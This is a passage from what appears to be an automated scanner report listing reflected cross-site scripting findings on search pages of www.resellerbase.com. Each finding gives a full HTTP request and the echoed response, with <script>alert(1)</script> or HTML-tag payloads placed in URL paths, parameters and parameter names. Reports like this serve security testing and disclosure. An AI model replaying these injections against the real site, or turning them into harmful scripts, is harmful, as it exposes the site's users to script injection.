The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d75cc<a>13fb2ce8384 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd75cc<a>13fb2ce8384&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd75cc<a>13fb2ce8384&opt=2 was not found on this server.</p>
...[SNIP]...

2.5207. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 169cd<a>2092df8ad08 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...169cd<a>2092df8ad08&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...169cd<a>2092df8ad08&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5208. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38c28<script>alert(1)</script>2d9d2b4375c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&38c28<script>alert(1)</script>2d9d2b4375c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&38c28<script>alert(1)</script>2d9d2b4375c=1 was not found on this server.</p>
...[SNIP]...

2.5209. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 63e47<a>63f126c02a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=263e47<a>63f126c02a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=263e47<a>63f126c02a was not found on this server.</p>
...[SNIP]...

2.5210. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 735f8<script>alert(1)</script>df6499174d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service735f8<script>alert(1)</script>df6499174d9/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service735f8<script>alert(1)</script>df6499174d9/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5211. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9dfac<script>alert(1)</script>4ffe19148c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other9dfac<script>alert(1)</script>4ffe19148c8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other9dfac<script>alert(1)</script>4ffe19148c8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5212. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b27e<script>alert(1)</script>5caa97459b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes7b27e<script>alert(1)</script>5caa97459b1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes7b27e<script>alert(1)</script>5caa97459b1/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5213. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92728<script>alert(1)</script>2a58388c1a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos92728<script>alert(1)</script>2a58388c1a2/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos92728<script>alert(1)</script>2a58388c1a2/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5214. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aeec2<script>alert(1)</script>0bfc4e2e1e1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesaeec2<script>alert(1)</script>0bfc4e2e1e1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesaeec2<script>alert(1)</script>0bfc4e2e1e1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5215. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5585f<script>alert(1)</script>6115082eca was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/search.php5585f<script>alert(1)</script>6115082eca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php5585f<script>alert(1)</script>6115082eca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5216. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b776c<a>5c96bda32fb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchb776c<a>5c96bda32fb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchb776c<a>5c96bda32fb&opt=2 was not found on this server.</p>
...[SNIP]...

2.5217. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e005c<a>9f9a3e5cd4a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...e005c<a>9f9a3e5cd4a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...e005c<a>9f9a3e5cd4a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5218. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9573c<script>alert(1)</script>c884bcfe77c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9573c<script>alert(1)</script>c884bcfe77c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9573c<script>alert(1)</script>c884bcfe77c=1 was not found on this server.</p>
...[SNIP]...

2.5219. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload aba8e<a>a55a0f8e241 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2aba8e<a>a55a0f8e241 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2aba8e<a>a55a0f8e241 was not found on this server.</p>
...[SNIP]...

2.5220. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f26f2<script>alert(1)</script>34ad69fb6b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicef26f2<script>alert(1)</script>34ad69fb6b4/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicef26f2<script>alert(1)</script>34ad69fb6b4/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5221. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6e161<script>alert(1)</script>477de1d3b84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other6e161<script>alert(1)</script>477de1d3b84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other6e161<script>alert(1)</script>477de1d3b84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5222. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5648<script>alert(1)</script>1aa91973b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesd5648<script>alert(1)</script>1aa91973b30/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesd5648<script>alert(1)</script>1aa91973b30/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5223. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2fc85<script>alert(1)</script>cdb365bab13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos2fc85<script>alert(1)</script>cdb365bab13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

